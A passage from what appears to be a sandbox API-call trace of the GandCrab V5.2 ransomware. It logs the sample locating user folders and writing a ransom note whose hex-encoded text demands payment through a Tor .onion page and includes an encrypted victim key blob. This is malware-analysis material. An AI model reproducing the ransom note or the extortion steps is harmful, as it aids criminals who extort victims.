returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0072.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0072.219] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.219] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.219] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.220] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.220] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.220] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.220] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.220] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\TITWMVJL-DECRYPT.txt") returned 112 [0072.221] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0072.222] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x